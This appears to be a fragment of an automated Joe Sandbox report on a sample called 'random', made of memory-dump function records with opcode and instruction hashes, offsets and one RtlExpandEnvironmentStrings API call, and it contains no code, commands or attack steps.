                                        • Instruction ID: a6ce5babd4d3766fd429a0d32157edeb31411bafb66deedf712a04b4dc43084b
                                        • Opcode Fuzzy Hash: c5d0b943f9de84774c78a780ad13b19ed83386de1e9444702bd5e4860ce26029
                                        • Instruction Fuzzy Hash: 8C615A355083949FC7258F39C85096E7BD0AF95314F0881BEE8E447392D639DC4AC756
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a1aac728ee4b4832bd396a6b465bb79e7de6bf291210a6027f85529f027abc15
                                        • Instruction ID: 96be8bd36e56bf27b6aa0d10c1fb3a2b8c76be11eb878f6b8047cc8e026e4330
                                        • Opcode Fuzzy Hash: a1aac728ee4b4832bd396a6b465bb79e7de6bf291210a6027f85529f027abc15
                                        • Instruction Fuzzy Hash: 0D5178B01093818BD310CF26C8617ABBBE1EFC6368F04595DE4D58B791E3788549CB9B
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8f1aa122ec59ae13e69cee9ce52d496232663b62829beb9f0467de8dcafb9024
                                        • Instruction ID: c97da413fd5a9132ec8511ec3fb1d3aba95cfbccb1f123846b9e4f248ad7db27
                                        • Opcode Fuzzy Hash: 8f1aa122ec59ae13e69cee9ce52d496232663b62829beb9f0467de8dcafb9024
                                        • Instruction Fuzzy Hash: 7E514CB19087548FE314DF29D49475BBBE1BBC8318F044A2EE4E987351E379DA088B96
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 422c5c46dec51ca66d6232300122104a863259cb16baaf1f2b2ece6416f4838a
                                        • Instruction ID: 48aa9a845809bd12f015dc09ae20762c45634ee2d6e6e50515cef5deddc0b902
                                        • Opcode Fuzzy Hash: 422c5c46dec51ca66d6232300122104a863259cb16baaf1f2b2ece6416f4838a
                                        • Instruction Fuzzy Hash: 6351066274D9904BD338993C4C623AA7A834BDB230F2DE37FE5F6873E1D55848069255
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d1b575b9db7d3d251ac50788cacbe8e7486d039b173afaa70e00c3db702b2f36
                                        • Instruction ID: c8fa41b63414d86ae28ae5069bc9de9cc5c1be9fc68955ccb818d97c0d6e7456
                                        • Opcode Fuzzy Hash: d1b575b9db7d3d251ac50788cacbe8e7486d039b173afaa70e00c3db702b2f36
                                        • Instruction Fuzzy Hash: 935123542087904ADB00DF7588D2A3A7BF0DF48305B0960DFD898DF7A7E638D2168B8E
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5c7e2a066f6d9e345ae6dd4228410094820ea6aa83ba62684cec3428317f83b8
                                        • Instruction ID: ddd3a1f12e0d028ceadd4f9d033f63418dc44a780f61091206b315d12a6ba213
                                        • Opcode Fuzzy Hash: 5c7e2a066f6d9e345ae6dd4228410094820ea6aa83ba62684cec3428317f83b8
                                        • Instruction Fuzzy Hash: 955182B18007059BD3209F68AD48717B7B4BB41328F14073DECA5A73E1E779EA15CB8A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 549b4f452cc201c5641bd5c19871334d83eb667d6dce25a4303c69a392540114
                                        • Instruction ID: 21a2246a7d2b4b35dc494bba2f4b78631a10c89df9ac8d713cd23d0779d29278
                                        • Opcode Fuzzy Hash: 549b4f452cc201c5641bd5c19871334d83eb667d6dce25a4303c69a392540114
                                        • Instruction Fuzzy Hash: D4310372B456104BC318DA29CC823ABB7D297C9324F0AD63AE898D73D4E63CCC418791
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bcaeed6e48b24ae2a8cd28d1105d407858c563e08032dd46f6af0fe4f131f9e0
                                        • Instruction ID: 4bae2713ce7709fe8da5589f50bc1a219f305d3d105056fe83fc3629ebc2cdfc
                                        • Opcode Fuzzy Hash: bcaeed6e48b24ae2a8cd28d1105d407858c563e08032dd46f6af0fe4f131f9e0
                                        • Instruction Fuzzy Hash: 3431B633A219114BE314CA29CD4479632D2ABD8328F3E86B99465DF7D2DD3B9D0386C0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a2a4d5fd578bd396aa0af15cb6ab0e54a13c3b7b2a9c76c21a4d61f111652cf1
                                        • Instruction ID: 1389e4d53b694fd295f4c99b563822772ee8ec12a6424706be6842d5b3f5de1d
                                        • Opcode Fuzzy Hash: a2a4d5fd578bd396aa0af15cb6ab0e54a13c3b7b2a9c76c21a4d61f111652cf1
                                        • Instruction Fuzzy Hash: 40311973A197144FC3289D7D889015BBB929BD5334F2A873EDAB54B3C1DE748C015786
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fbbfd85ed4625c5c4a602328de8fb4c924b8bb4c62c88757fd3e9dc444327da8
                                        • Instruction ID: 6c2a7a40945fba97b60b2dc016bc6914b469ce470df0d3b36ab1ee23dd066ef4
                                        • Opcode Fuzzy Hash: fbbfd85ed4625c5c4a602328de8fb4c924b8bb4c62c88757fd3e9dc444327da8
                                        • Instruction Fuzzy Hash: 763159759483819BD718CB34C8A13BBBBD19B97318F189A2DE0E193391D338C5468B5B
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aec1cfbcc0f08cee27abf22853a84cb241b0a967adefa26a82fd7ec6fe8abb82
                                        • Instruction ID: debfc5dd17bc83b4888ed899efee17c0fbb67269f2955dd3302a8cbeb79cd110
                                        • Opcode Fuzzy Hash: aec1cfbcc0f08cee27abf22853a84cb241b0a967adefa26a82fd7ec6fe8abb82
                                        • Instruction Fuzzy Hash: 1B312673E21A380BC7088D3D9C1126A75829BD5265B9EC37DEDAADF3C2DA35DC0582D0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 41305cf3b9d177b5ddb8f36fbe4dc537e4b4ae08f3accfdb3d01e3decd18bcb9
                                        • Instruction ID: c3ef201410797beedfbb423dd4b6a4b613f7a1191b873fa7b6aad00fbf48a4bb
                                        • Opcode Fuzzy Hash: 41305cf3b9d177b5ddb8f36fbe4dc537e4b4ae08f3accfdb3d01e3decd18bcb9
                                        • Instruction Fuzzy Hash: D3210B6590D3C146D7394B3A44243B7EFE25FE7345F2C58AED0D987392DA798005871A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 080992afd48c0527231705f8ceffc0aba193dc8929bd9ea4cd8631f6a582b227
                                        • Instruction ID: b0168b037b63377ee53a696943b9184fc20a9d47a10823b489a3532680c59eb7
                                        • Opcode Fuzzy Hash: 080992afd48c0527231705f8ceffc0aba193dc8929bd9ea4cd8631f6a582b227
                                        • Instruction Fuzzy Hash: 7B314B2290D6F30EC336892D449047E7AA05AE621472943FFDCF19B3C3C52AC94587E5
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ef136d90a11ccdb0dce14e10ad2ebc64eaa621fdbac3e539be7e273f88757557
                                        • Instruction ID: ac5a2fd1a34d00fe81212d9a0dd75a5008a32a6ff7d51fa23ef38769660ba55c
                                        • Opcode Fuzzy Hash: ef136d90a11ccdb0dce14e10ad2ebc64eaa621fdbac3e539be7e273f88757557
                                        • Instruction Fuzzy Hash: 392129B971A1A10BD700DF399DD412B77A2D7C730671F4577DA80D3392C27AE80AC225
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eaf3a552830be57f3b076121e3f4128acb6b5eaa3b8ddd6eb86dc69abef60401
                                        • Instruction ID: f625d5dc7cc146dca826755e11d0e3d06b3d9b76c6b30af6ca5c7fe59dabf8e9
                                        • Opcode Fuzzy Hash: eaf3a552830be57f3b076121e3f4128acb6b5eaa3b8ddd6eb86dc69abef60401
                                        • Instruction Fuzzy Hash: 2C31F2766183418BD708CF39C89136BBBE2AB86318F18CA6DE4D1D7384D73C88458B92
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                        • Instruction ID: 34218d49f98f4d04757d6d7688404ab739ac49d953720a668d3546879b641f63
                                        • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                        • Instruction Fuzzy Hash: 7411EC336491D40EC7158D3C8400566BF930A97735F1993DAF4F4973D2D52B8D8E835A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5b0bd2af23d8aba3338285f4a2fcfdf2a171a9890d65b304db72d3eef606dba8
                                        • Instruction ID: e2b1fa06f32b2fd48b90287ee0e38661db697dc0127cfdde8b5722762f88e760
                                        • Opcode Fuzzy Hash: 5b0bd2af23d8aba3338285f4a2fcfdf2a171a9890d65b304db72d3eef606dba8
                                        • Instruction Fuzzy Hash: 440192F170171197DA209E15A5C172BB2A85F90708F18543ED84457342EB7DEC08C2DD
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 88e438cc32f6b5a12cb4a8709c5ccb5f2cf69f7e5815e22606a40b63f7bc33cd
                                        • Instruction ID: 7b6863c9c9260bd0558c6f806dd5f9e3415f7290086a878cc0b8c3271b95cfd7
                                        • Opcode Fuzzy Hash: 88e438cc32f6b5a12cb4a8709c5ccb5f2cf69f7e5815e22606a40b63f7bc33cd
                                        • Instruction Fuzzy Hash: 6EF0F936544304ABE1105B459C40D3777AEFB9E728F104319F715332A1E772ED2197A9
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                        • Instruction ID: 65b04920acd8ec40befbc16cdab85cd19ddd64fc0dfac740f80379ed40623b4a
                                        • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                        • Instruction Fuzzy Hash: 7CD0A7715487B50E57588D3C44A04BBFBE8E987712B1814AFE8D6E3206D225DC47469D
                                        APIs
                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0042561D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: EnvironmentExpandStrings
                                        • String ID: $%$p:#$MO
                                        • API String ID: 237503144-3521940197
                                        • Opcode ID: 23a9facff3ed32d27b45f5c78396115d40fb07a2703201d84f017c1d29451edb
                                        • Instruction ID: 81944db62257c61826c9772faf3d9c506449667b4075365b7c5b7f4bc0eeec7d
                                        • Opcode Fuzzy Hash: 23a9facff3ed32d27b45f5c78396115d40fb07a2703201d84f017c1d29451edb
                                        • Instruction Fuzzy Hash: 6141DF365183448FE310CF24C88475FBBE2FFC5758F16892CE4D49B680D6B9CA0A8B86